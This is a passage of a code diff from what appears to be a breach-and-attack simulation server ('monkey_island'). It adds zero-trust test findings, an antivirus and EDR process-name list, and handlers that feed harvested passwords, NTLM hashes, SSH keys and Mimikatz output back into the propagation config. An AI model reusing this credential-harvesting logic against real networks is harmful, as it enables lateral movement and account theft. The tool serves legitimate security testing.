|
|
||||||
|
def add_system_info_ssh_keys_to_config(ssh_info):
|
||||||
|
for user in ssh_info:
|
||||||
|
ConfigService.creds_add_username(user['name'])
|
||||||
|
# Public key is useless without private key
|
||||||
|
if user['public_key'] and user['private_key']:
|
||||||
|
ConfigService.ssh_add_keys(user['public_key'], user['private_key'],
|
||||||
|
user['name'], user['ip'])
|
||||||
|
|
||||||
|
|
||||||
|
def add_ip_to_ssh_keys(ip, ssh_info):
|
||||||
|
for key in ssh_info:
|
||||||
|
key['ip'] = ip['addr']
|
||||||
|
|
||||||
|
|
||||||
|
def encrypt_system_info_ssh_keys(ssh_info):
|
||||||
|
for idx, user in enumerate(ssh_info):
|
||||||
|
for field in ['public_key', 'private_key', 'known_hosts']:
|
||||||
|
if ssh_info[idx][field]:
|
||||||
|
ssh_info[idx][field] = encryptor.enc(ssh_info[idx][field].encode('utf-8'))
|
||||||
|
|
||||||
|
|
||||||
|
def process_credential_info(telemetry_json):
|
||||||
|
if 'credentials' in telemetry_json['data']:
|
||||||
|
creds = telemetry_json['data']['credentials']
|
||||||
|
encrypt_system_info_creds(creds)
|
||||||
|
add_system_info_creds_to_config(creds)
|
||||||
|
replace_user_dot_with_comma(creds)
|
||||||
|
|
||||||
|
|
||||||
|
def replace_user_dot_with_comma(creds):
|
||||||
|
for user in creds:
|
||||||
|
if -1 != user.find('.'):
|
||||||
|
new_user = user.replace('.', ',')
|
||||||
|
creds[new_user] = creds.pop(user)
|
||||||
|
|
||||||
|
|
||||||
|
def add_system_info_creds_to_config(creds):
|
||||||
|
for user in creds:
|
||||||
|
ConfigService.creds_add_username(user)
|
||||||
|
if 'password' in creds[user]:
|
||||||
|
ConfigService.creds_add_password(creds[user]['password'])
|
||||||
|
if 'lm_hash' in creds[user]:
|
||||||
|
ConfigService.creds_add_lm_hash(creds[user]['lm_hash'])
|
||||||
|
if 'ntlm_hash' in creds[user]:
|
||||||
|
ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash'])
|
||||||
|
|
||||||
|
|
||||||
|
def encrypt_system_info_creds(creds):
|
||||||
|
for user in creds:
|
||||||
|
for field in ['password', 'lm_hash', 'ntlm_hash']:
|
||||||
|
if field in creds[user]:
|
||||||
|
# this encoding is because we might run into passwords which are not pure ASCII
|
||||||
|
creds[user][field] = encryptor.enc(creds[user][field].encode('utf-8'))
|
||||||
|
|
||||||
|
|
||||||
|
def process_mimikatz_and_wmi_info(telemetry_json):
|
||||||
|
users_secrets = {}
|
||||||
|
if 'mimikatz' in telemetry_json['data']:
|
||||||
|
users_secrets = mimikatz_utils.MimikatzSecrets. \
|
||||||
|
extract_secrets_from_mimikatz(telemetry_json['data'].get('mimikatz', ''))
|
||||||
|
if 'wmi' in telemetry_json['data']:
|
||||||
|
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id')
|
||||||
|
wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
|
||||||
|
wmi_handler.process_and_handle_wmi_info()
|
||||||
|
|
||||||
|
|
||||||
|
def process_aws_data(telemetry_json):
|
||||||
|
if 'aws' in telemetry_json['data']:
|
||||||
|
if 'instance_id' in telemetry_json['data']['aws']:
|
||||||
|
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id')
|
||||||
|
mongo.db.monkey.update_one({'_id': monkey_id},
|
||||||
|
{'$set': {'aws_instance_id': telemetry_json['data']['aws']['instance_id']}})
|
|
@ -0,0 +1,13 @@
|
||||||
|
from monkey_island.cc.services.node import NodeService
|
||||||
|
from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field
|
||||||
|
from monkey_island.cc.services.telemetry.zero_trust_tests.tunneling import test_tunneling_violation
|
||||||
|
|
||||||
|
|
||||||
|
def process_tunnel_telemetry(telemetry_json):
|
||||||
|
test_tunneling_violation(telemetry_json)
|
||||||
|
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])["_id"]
|
||||||
|
if telemetry_json['data']['proxy'] is not None:
|
||||||
|
tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(telemetry_json)
|
||||||
|
NodeService.set_monkey_tunnel(monkey_id, tunnel_host_ip)
|
||||||
|
else:
|
||||||
|
NodeService.unset_all_monkey_tunnels(monkey_id)
|
|
@ -0,0 +1,18 @@
|
||||||
|
from monkey_island.cc.services.edge import EdgeService
|
||||||
|
from monkey_island.cc.services.node import NodeService
|
||||||
|
|
||||||
|
|
||||||
|
def get_edge_by_scan_or_exploit_telemetry(telemetry_json):
|
||||||
|
dst_ip = telemetry_json['data']['machine']['ip_addr']
|
||||||
|
dst_domain_name = telemetry_json['data']['machine']['domain_name']
|
||||||
|
src_monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||||
|
dst_node = NodeService.get_monkey_by_ip(dst_ip)
|
||||||
|
if dst_node is None:
|
||||||
|
dst_node = NodeService.get_or_create_node(dst_ip, dst_domain_name)
|
||||||
|
|
||||||
|
return EdgeService.get_or_create_edge(src_monkey["_id"], dst_node["_id"])
|
||||||
|
|
||||||
|
|
||||||
|
def get_tunnel_host_ip_from_proxy_field(telemetry_json):
|
||||||
|
tunnel_host_ip = telemetry_json['data']['proxy'].split(":")[-2].replace("//", "")
|
||||||
|
return tunnel_host_ip
|
|
@ -0,0 +1,47 @@
|
||||||
|
import json
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_LOCAL, \
|
||||||
|
STATUS_PASSED, STATUS_FAILED, TEST_ENDPOINT_SECURITY_EXISTS
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
from monkey_island.cc.services.telemetry.zero_trust_tests.known_anti_viruses import ANTI_VIRUS_KNOWN_PROCESS_NAMES
|
||||||
|
|
||||||
|
|
||||||
|
def test_antivirus_existence(telemetry_json):
|
||||||
|
current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||||
|
if 'process_list' in telemetry_json['data']:
|
||||||
|
process_list_event = Event.create_event(
|
||||||
|
title="Process list",
|
||||||
|
message="Monkey on {} scanned the process list".format(current_monkey.hostname),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_LOCAL)
|
||||||
|
events = [process_list_event]
|
||||||
|
|
||||||
|
av_processes = filter_av_processes(telemetry_json)
|
||||||
|
|
||||||
|
for process in av_processes:
|
||||||
|
events.append(Event.create_event(
|
||||||
|
title="Found AV process",
|
||||||
|
message="The process '{}' was recognized as an Anti Virus process. Process "
|
||||||
|
"details: {}".format(process[1]['name'], json.dumps(process[1])),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_LOCAL
|
||||||
|
))
|
||||||
|
|
||||||
|
if len(av_processes) > 0:
|
||||||
|
test_status = STATUS_PASSED
|
||||||
|
else:
|
||||||
|
test_status = STATUS_FAILED
|
||||||
|
AggregateFinding.create_or_add_to_existing(
|
||||||
|
test=TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def filter_av_processes(telemetry_json):
|
||||||
|
all_processes = telemetry_json['data']['process_list'].items()
|
||||||
|
av_processes = []
|
||||||
|
for process in all_processes:
|
||||||
|
process_name = process[1]['name']
|
||||||
|
# This is for case-insensitive `in`. Generator expression is to save memory.
|
||||||
|
if process_name.upper() in (known_av_name.upper() for known_av_name in ANTI_VIRUS_KNOWN_PROCESS_NAMES):
|
||||||
|
av_processes.append(process)
|
||||||
|
return av_processes
|
|
@ -0,0 +1,37 @@
|
||||||
|
from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_COMMUNICATE_AS_NEW_USER, \
|
||||||
|
STATUS_PASSED
|
||||||
|
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
|
||||||
|
COMM_AS_NEW_USER_FAILED_FORMAT = "Monkey on {} couldn't communicate as new user. Details: {}"
|
||||||
|
COMM_AS_NEW_USER_SUCCEEDED_FORMAT = \
|
||||||
|
"New user created by Monkey on {} successfully tried to communicate with the internet. Details: {}"
|
||||||
|
|
||||||
|
|
||||||
|
def test_new_user_communication(current_monkey, success, message):
|
||||||
|
AggregateFinding.create_or_add_to_existing(
|
||||||
|
test=TEST_COMMUNICATE_AS_NEW_USER,
|
||||||
|
# If the monkey succeeded to create a user, then the test failed.
|
||||||
|
status=STATUS_FAILED if success else STATUS_PASSED,
|
||||||
|
events=[
|
||||||
|
get_attempt_event(current_monkey),
|
||||||
|
get_result_event(current_monkey, message, success)
|
||||||
|
]
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def get_attempt_event(current_monkey):
|
||||||
|
tried_to_communicate_event = Event.create_event(
|
||||||
|
title="Communicate as new user",
|
||||||
|
message="Monkey on {} tried to create a new user and communicate from it.".format(current_monkey.hostname),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK)
|
||||||
|
return tried_to_communicate_event
|
||||||
|
|
||||||
|
|
||||||
|
def get_result_event(current_monkey, message, success):
|
||||||
|
message_format = COMM_AS_NEW_USER_SUCCEEDED_FORMAT if success else COMM_AS_NEW_USER_FAILED_FORMAT
|
||||||
|
|
||||||
|
return Event.create_event(
|
||||||
|
title="Communicate as new user",
|
||||||
|
message=message_format.format(current_monkey.hostname, message),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK)
|
|
@ -0,0 +1,70 @@
|
||||||
|
import json
|
||||||
|
|
||||||
|
from common.data.network_consts import ES_SERVICE
|
||||||
|
from common.data.zero_trust_consts import *
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
|
||||||
|
HTTP_SERVERS_SERVICES_NAMES = ['tcp-80']
|
||||||
|
|
||||||
|
|
||||||
|
def test_open_data_endpoints(telemetry_json):
|
||||||
|
services = telemetry_json["data"]["machine"]["services"]
|
||||||
|
current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||||
|
found_http_server_status = STATUS_PASSED
|
||||||
|
found_elastic_search_server = STATUS_PASSED
|
||||||
|
|
||||||
|
events = [
|
||||||
|
Event.create_event(
|
||||||
|
title="Scan Telemetry",
|
||||||
|
message="Monkey on {} tried to perform a network scan, the target was {}.".format(
|
||||||
|
current_monkey.hostname,
|
||||||
|
telemetry_json["data"]["machine"]["ip_addr"]),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK,
|
||||||
|
timestamp=telemetry_json["timestamp"]
|
||||||
|
)
|
||||||
|
]
|
||||||
|
|
||||||
|
for service_name, service_data in services.items():
|
||||||
|
events.append(Event.create_event(
|
||||||
|
title="Scan telemetry analysis",
|
||||||
|
message="Scanned service: {}.".format(service_name),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
))
|
||||||
|
if service_name in HTTP_SERVERS_SERVICES_NAMES:
|
||||||
|
found_http_server_status = STATUS_FAILED
|
||||||
|
events.append(Event.create_event(
|
||||||
|
title="Scan telemetry analysis",
|
||||||
|
message="Service {} on {} recognized as an open data endpoint! Service details: {}".format(
|
||||||
|
service_data["display_name"],
|
||||||
|
telemetry_json["data"]["machine"]["ip_addr"],
|
||||||
|
json.dumps(service_data)
|
||||||
|
),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
))
|
||||||
|
if service_name == ES_SERVICE:
|
||||||
|
found_elastic_search_server = STATUS_FAILED
|
||||||
|
events.append(Event.create_event(
|
||||||
|
title="Scan telemetry analysis",
|
||||||
|
message="Service {} on {} recognized as an open data endpoint! Service details: {}".format(
|
||||||
|
service_data["display_name"],
|
||||||
|
telemetry_json["data"]["machine"]["ip_addr"],
|
||||||
|
json.dumps(service_data)
|
||||||
|
),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
))
|
||||||
|
|
||||||
|
AggregateFinding.create_or_add_to_existing(
|
||||||
|
test=TEST_DATA_ENDPOINT_HTTP,
|
||||||
|
status=found_http_server_status,
|
||||||
|
events=events
|
||||||
|
)
|
||||||
|
|
||||||
|
AggregateFinding.create_or_add_to_existing(
|
||||||
|
test=TEST_DATA_ENDPOINT_ELASTIC,
|
||||||
|
status=found_elastic_search_server,
|
||||||
|
events=events
|
||||||
|
)
|
||||||
|
|
||||||
|
add_malicious_activity_to_timeline(events)
|
|
@ -0,0 +1,87 @@
|
||||||
|
ANTI_VIRUS_KNOWN_PROCESS_NAMES = [
|
||||||
|
u"AvastSvc.exe",
|
||||||
|
u"AvastUI.exe",
|
||||||
|
u"avcenter.exe",
|
||||||
|
u"avconfig.exe",
|
||||||
|
u"avgcsrvx.exe",
|
||||||
|
u"avgidsagent.exe",
|
||||||
|
u"avgnt.exe",
|
||||||
|
u"avgrsx.exe",
|
||||||
|
u"avguard.exe",
|
||||||
|
u"avgui.exe",
|
||||||
|
u"avgwdsvc.exe",
|
||||||
|
u"avp.exe",
|
||||||
|
u"avscan.exe",
|
||||||
|
u"bdagent.exe",
|
||||||
|
u"ccuac.exe",
|
||||||
|
u"egui.exe",
|
||||||
|
u"hijackthis.exe",
|
||||||
|
u"instup.exe",
|
||||||
|
u"keyscrambler.exe",
|
||||||
|
u"mbam.exe",
|
||||||
|
u"mbamgui.exe",
|
||||||
|
u"mbampt.exe",
|
||||||
|
u"mbamscheduler.exe",
|
||||||
|
u"mbamservice.exe",
|
||||||
|
u"MpCmdRun.exe",
|
||||||
|
u"MSASCui.exe",
|
||||||
|
u"MsMpEng.exe",
|
||||||
|
u"rstrui.exe",
|
||||||
|
u"spybotsd.exe",
|
||||||
|
u"zlclient.exe",
|
||||||
|
u"SymCorpUI.exe",
|
||||||
|
u"ccSvcHst.exe",
|
||||||
|
u"ccApp.exe",
|
||||||
|
u"LUALL.exe",
|
||||||
|
u"SMC.exe",
|
||||||
|
u"SMCgui.exe",
|
||||||
|
u"Rtvscan.exe",
|
||||||
|
u"LuComServer.exe",
|
||||||
|
u"ProtectionUtilSurrogate.exe",
|
||||||
|
u"ClientRemote.exe",
|
||||||
|
u"SemSvc.exe",
|
||||||
|
u"SemLaunchSvc.exe",
|
||||||
|
u"sesmcontinst.exe",
|
||||||
|
u"LuCatalog.exe",
|
||||||
|
u"LUALL.exe",
|
||||||
|
u"LuCallbackProxy.exe",
|
||||||
|
u"LuComServer_3_3.exe",
|
||||||
|
u"httpd.exe",
|
||||||
|
u"dbisqlc.exe",
|
||||||
|
u"dbsrv16.exe",
|
||||||
|
u"semapisrv.exe",
|
||||||
|
u"snac64.exe",
|
||||||
|
u"AutoExcl.exe",
|
||||||
|
u"DoScan.exe",
|
||||||
|
u"nlnhook.exe",
|
||||||
|
u"SavUI.exe",
|
||||||
|
u"SepLiveUpdate.exe",
|
||||||
|
u"Smc.exe",
|
||||||
|
u"SmcGui.exe",
|
||||||
|
u"SymCorpUI.exe",
|
||||||
|
u"symerr.exe",
|
||||||
|
u"ccSvcHst.exe",
|
||||||
|
u"DevViewer.exe",
|
||||||
|
u"DWHWizrd.exe",
|
||||||
|
u"RtvStart.exe",
|
||||||
|
u"roru.exe",
|
||||||
|
u"WSCSAvNotifier",
|
||||||
|
# Guardicore Centra
|
||||||
|
# Linux
|
||||||
|
u"gc-agents-service",
|
||||||
|
u"gc-guest-agent",
|
||||||
|
u"gc-guardig",
|
||||||
|
u"gc-digger",
|
||||||
|
u"gc-fastpath",
|
||||||
|
u"gc-enforcement-agent",
|
||||||
|
u"gc-enforcement-channel",
|
||||||
|
u"gc-detection-agent",
|
||||||
|
# Windows
|
||||||
|
u"gc-guest-agent.exe",
|
||||||
|
u"gc-windig.exe",
|
||||||
|
u"gc-digger.exe",
|
||||||
|
u"gc-fastpath.exe",
|
||||||
|
u"gc-enforcement-channel.exe",
|
||||||
|
u"gc-enforcement-agent.exe",
|
||||||
|
u"gc-agent-ui.exe"
|
||||||
|
]
|
|
@ -0,0 +1,39 @@
|
||||||
|
from common.data.zero_trust_consts import *
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
|
||||||
|
|
||||||
|
def test_machine_exploited(current_monkey, exploit_successful, exploiter, target_ip, timestamp):
|
||||||
|
events = [
|
||||||
|
Event.create_event(
|
||||||
|
title="Exploit attempt",
|
||||||
|
message="Monkey on {} attempted to exploit {} using {}.".format(
|
||||||
|
current_monkey.hostname,
|
||||||
|
target_ip,
|
||||||
|
exploiter),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK,
|
||||||
|
timestamp=timestamp
|
||||||
|
)
|
||||||
|
]
|
||||||
|
status = STATUS_PASSED
|
||||||
|
if exploit_successful:
|
||||||
|
events.append(
|
||||||
|
Event.create_event(
|
||||||
|
title="Exploit success!",
|
||||||
|
message="Monkey on {} successfully exploited {} using {}.".format(
|
||||||
|
current_monkey.hostname,
|
||||||
|
target_ip,
|
||||||
|
exploiter),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK,
|
||||||
|
timestamp=timestamp)
|
||||||
|
)
|
||||||
|
status = STATUS_FAILED
|
||||||
|
|
||||||
|
AggregateFinding.create_or_add_to_existing(
|
||||||
|
test=TEST_MACHINE_EXPLOITED,
|
||||||
|
status=status,
|
||||||
|
events=events
|
||||||
|
)
|
||||||
|
|
||||||
|
add_malicious_activity_to_timeline(events)
|
|
@ -0,0 +1,110 @@
|
||||||
|
import itertools
|
||||||
|
from six import text_type
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED
|
||||||
|
from common.network.network_range import NetworkRange
|
||||||
|
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst, get_ip_if_in_subnet
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
from monkey_island.cc.models.zero_trust.segmentation_finding import SegmentationFinding
|
||||||
|
from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups
|
||||||
|
|
||||||
|
SEGMENTATION_DONE_EVENT_TEXT = "Monkey on {hostname} is done attempting cross-segment communications " \
|
||||||
|
"from `{src_seg}` segments to `{dst_seg}` segments."
|
||||||
|
|
||||||
|
SEGMENTATION_VIOLATION_EVENT_TEXT = \
|
||||||
|
"Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment {source_seg}) " \
|
||||||
|
"managed to communicate cross segment to {target_ip} (in segment {target_seg})."
|
||||||
|
|
||||||
|
|
||||||
|
def test_segmentation_violation(current_monkey, target_ip):
|
||||||
|
# TODO - lower code duplication between this and report.py.
|
||||||
|
subnet_groups = get_config_network_segments_as_subnet_groups()
|
||||||
|
for subnet_group in subnet_groups:
|
||||||
|
subnet_pairs = itertools.product(subnet_group, subnet_group)
|
||||||
|
for subnet_pair in subnet_pairs:
|
||||||
|
source_subnet = subnet_pair[0]
|
||||||
|
target_subnet = subnet_pair[1]
|
||||||
|
if is_segmentation_violation(current_monkey, target_ip, source_subnet, target_subnet):
|
||||||
|
event = get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet)
|
||||||
|
SegmentationFinding.create_or_add_to_existing_finding(
|
||||||
|
subnets=[source_subnet, target_subnet],
|
||||||
|
status=STATUS_FAILED,
|
||||||
|
segmentation_event=event
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def is_segmentation_violation(current_monkey, target_ip, source_subnet, target_subnet):
|
||||||
|
# type: (Monkey, str, str, str) -> bool
|
||||||
|
"""
|
||||||
|
Checks is a specific communication is a segmentation violation.
|
||||||
|
:param current_monkey: The source monkey which originated the communication.
|
||||||
|
:param target_ip: The target with which the current monkey communicated with.
|
||||||
|
:param source_subnet: The segment the monkey belongs to.
|
||||||
|
:param target_subnet: Another segment which the monkey isn't supposed to communicate with.
|
||||||
|
:return: True if this is a violation of segmentation between source_subnet and target_subnet; Otherwise, False.
|
||||||
|
"""
|
||||||
|
if source_subnet == target_subnet:
|
||||||
|
return False
|
||||||
|
source_subnet_range = NetworkRange.get_range_obj(source_subnet)
|
||||||
|
target_subnet_range = NetworkRange.get_range_obj(target_subnet)
|
||||||
|
|
||||||
|
if target_subnet_range.is_in_range(text_type(target_ip)):
|
||||||
|
cross_segment_ip = get_ip_in_src_and_not_in_dst(
|
||||||
|
current_monkey.ip_addresses,
|
||||||
|
source_subnet_range,
|
||||||
|
target_subnet_range)
|
||||||
|
|
||||||
|
return cross_segment_ip is not None
|
||||||
|
|
||||||
|
|
||||||
|
def get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet):
|
||||||
|
return Event.create_event(
|
||||||
|
title="Segmentation event",
|
||||||
|
message=SEGMENTATION_VIOLATION_EVENT_TEXT.format(
|
||||||
|
hostname=current_monkey.hostname,
|
||||||
|
source_ip=get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(source_subnet)),
|
||||||
|
source_seg=source_subnet,
|
||||||
|
target_ip=target_ip,
|
||||||
|
target_seg=target_subnet
|
||||||
|
),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def test_passed_findings_for_unreached_segments(current_monkey):
|
||||||
|
flat_all_subnets = [item for sublist in get_config_network_segments_as_subnet_groups() for item in sublist]
|
||||||
|
create_or_add_findings_for_all_pairs(flat_all_subnets, current_monkey)
|
||||||
|
|
||||||
|
|
||||||
|
def create_or_add_findings_for_all_pairs(all_subnets, current_monkey):
|
||||||
|
# Filter the subnets that this monkey is part of.
|
||||||
|
this_monkey_subnets = []
|
||||||
|
for subnet in all_subnets:
|
||||||
|
if get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(subnet)) is not None:
|
||||||
|
this_monkey_subnets.append(subnet)
|
||||||
|
|
||||||
|
# Get all the other subnets.
|
||||||
|
other_subnets = list(set(all_subnets) - set(this_monkey_subnets))
|
||||||
|
|
||||||
|
# Calculate the cartesian product - (this monkey subnets X other subnets). These pairs are the pairs that the monkey
|
||||||
|
# should have tested.
|
||||||
|
all_subnets_pairs_for_this_monkey = itertools.product(this_monkey_subnets, other_subnets)
|
||||||
|
|
||||||
|
for subnet_pair in all_subnets_pairs_for_this_monkey:
|
||||||
|
SegmentationFinding.create_or_add_to_existing_finding(
|
||||||
|
subnets=list(subnet_pair),
|
||||||
|
status=STATUS_PASSED,
|
||||||
|
segmentation_event=get_segmentation_done_event(current_monkey, subnet_pair)
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def get_segmentation_done_event(current_monkey, subnet_pair):
|
||||||
|
return Event.create_event(
|
||||||
|
title="Segmentation test done",
|
||||||
|
message=SEGMENTATION_DONE_EVENT_TEXT.format(
|
||||||
|
hostname=current_monkey.hostname,
|
||||||
|
src_seg=subnet_pair[0],
|
||||||
|
dst_seg=subnet_pair[1]),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
)
|
|
@ -0,0 +1,46 @@
|
||||||
|
import uuid
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_PASSED, STATUS_FAILED, \
|
||||||
|
EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||||
|
from monkey_island.cc.models.zero_trust.segmentation_finding import SegmentationFinding
|
||||||
|
from monkey_island.cc.services.telemetry.zero_trust_tests.segmentation import create_or_add_findings_for_all_pairs
|
||||||
|
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||||
|
|
||||||
|
FIRST_SUBNET = "1.1.1.1"
|
||||||
|
SECOND_SUBNET = "2.2.2.0/24"
|
||||||
|
THIRD_SUBNET = "3.3.3.3-3.3.3.200"
|
||||||
|
|
||||||
|
|
||||||
|
class TestSegmentationTests(IslandTestCase):
|
||||||
|
def test_create_findings_for_all_done_pairs(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
all_subnets = [FIRST_SUBNET, SECOND_SUBNET, THIRD_SUBNET]
|
||||||
|
|
||||||
|
monkey = Monkey(
|
||||||
|
guid=str(uuid.uuid4()),
|
||||||
|
ip_addresses=[FIRST_SUBNET])
|
||||||
|
|
||||||
|
# no findings
|
||||||
|
self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION)), 0)
|
||||||
|
|
||||||
|
# This is like the monkey is done and sent done telem
|
||||||
|
create_or_add_findings_for_all_pairs(all_subnets, monkey)
|
||||||
|
|
||||||
|
# There are 2 subnets in which the monkey is NOT
|
||||||
|
self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 2)
|
||||||
|
|
||||||
|
# This is a monkey from 2nd subnet communicated with 1st subnet.
|
||||||
|
SegmentationFinding.create_or_add_to_existing_finding(
|
||||||
|
[FIRST_SUBNET, SECOND_SUBNET],
|
||||||
|
STATUS_FAILED,
|
||||||
|
Event.create_event(title="sdf", message="asd", event_type=EVENT_TYPE_MONKEY_NETWORK)
|
||||||
|
)
|
||||||
|
|
||||||
|
self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 1)
|
||||||
|
self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_FAILED)), 1)
|
||||||
|
self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION)), 2)
|
|
@ -0,0 +1,27 @@
|
||||||
|
from common.data.zero_trust_consts import TEST_TUNNELING, STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field
|
||||||
|
|
||||||
|
|
||||||
|
def test_tunneling_violation(tunnel_telemetry_json):
|
||||||
|
if tunnel_telemetry_json['data']['proxy'] is not None:
|
||||||
|
# Monkey is tunneling, create findings
|
||||||
|
tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(tunnel_telemetry_json)
|
||||||
|
current_monkey = Monkey.get_single_monkey_by_guid(tunnel_telemetry_json['monkey_guid'])
|
||||||
|
tunneling_events = [Event.create_event(
|
||||||
|
title="Tunneling event",
|
||||||
|
message="Monkey on {hostname} tunneled traffic through {proxy}.".format(
|
||||||
|
hostname=current_monkey.hostname, proxy=tunnel_host_ip),
|
||||||
|
event_type=EVENT_TYPE_MONKEY_NETWORK,
|
||||||
|
timestamp=tunnel_telemetry_json['timestamp']
|
||||||
|
)]
|
||||||
|
|
||||||
|
AggregateFinding.create_or_add_to_existing(
|
||||||
|
test=TEST_TUNNELING,
|
||||||
|
status=STATUS_FAILED,
|
||||||
|
events=tunneling_events
|
||||||
|
)
|
||||||
|
|
||||||
|
add_malicious_activity_to_timeline(tunneling_events)
|
|
@ -1,6 +1,7 @@
|
||||||
import unittest
|
import unittest
|
||||||
from monkey_island.cc.environment.environment import env
|
from monkey_island.cc.environment.environment import env
|
||||||
from monkey_island.cc.models import Monkey
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||||
|
|
||||||
|
|
||||||
class IslandTestCase(unittest.TestCase):
|
class IslandTestCase(unittest.TestCase):
|
||||||
|
@ -10,3 +11,7 @@ class IslandTestCase(unittest.TestCase):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def clean_monkey_db():
|
def clean_monkey_db():
|
||||||
Monkey.objects().delete()
|
Monkey.objects().delete()
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def clean_finding_db():
|
||||||
|
Finding.objects().delete()
|
||||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -55,6 +55,7 @@
|
||||||
"null-loader": "^0.1.1",
|
"null-loader": "^0.1.1",
|
||||||
"phantomjs-prebuilt": "^2.1.16",
|
"phantomjs-prebuilt": "^2.1.16",
|
||||||
"react-addons-test-utils": "^15.6.2",
|
"react-addons-test-utils": "^15.6.2",
|
||||||
|
"react-event-timeline": "^1.6.3",
|
||||||
"react-hot-loader": "^4.3.11",
|
"react-hot-loader": "^4.3.11",
|
||||||
"rimraf": "^2.6.2",
|
"rimraf": "^2.6.2",
|
||||||
"style-loader": "^0.22.1",
|
"style-loader": "^0.22.1",
|
||||||
|
@ -64,12 +65,15 @@
|
||||||
"webpack-dev-server": "^3.1.9"
|
"webpack-dev-server": "^3.1.9"
|
||||||
},
|
},
|
||||||
"dependencies": {
|
"dependencies": {
|
||||||
|
"@emotion/core": "^10.0.10",
|
||||||
"@kunukn/react-collapse": "^1.0.5",
|
"@kunukn/react-collapse": "^1.0.5",
|
||||||
"classnames": "^2.2.6",
|
|
||||||
"bootstrap": "3.4.1",
|
"bootstrap": "3.4.1",
|
||||||
|
"classnames": "^2.2.6",
|
||||||
"core-js": "^2.5.7",
|
"core-js": "^2.5.7",
|
||||||
|
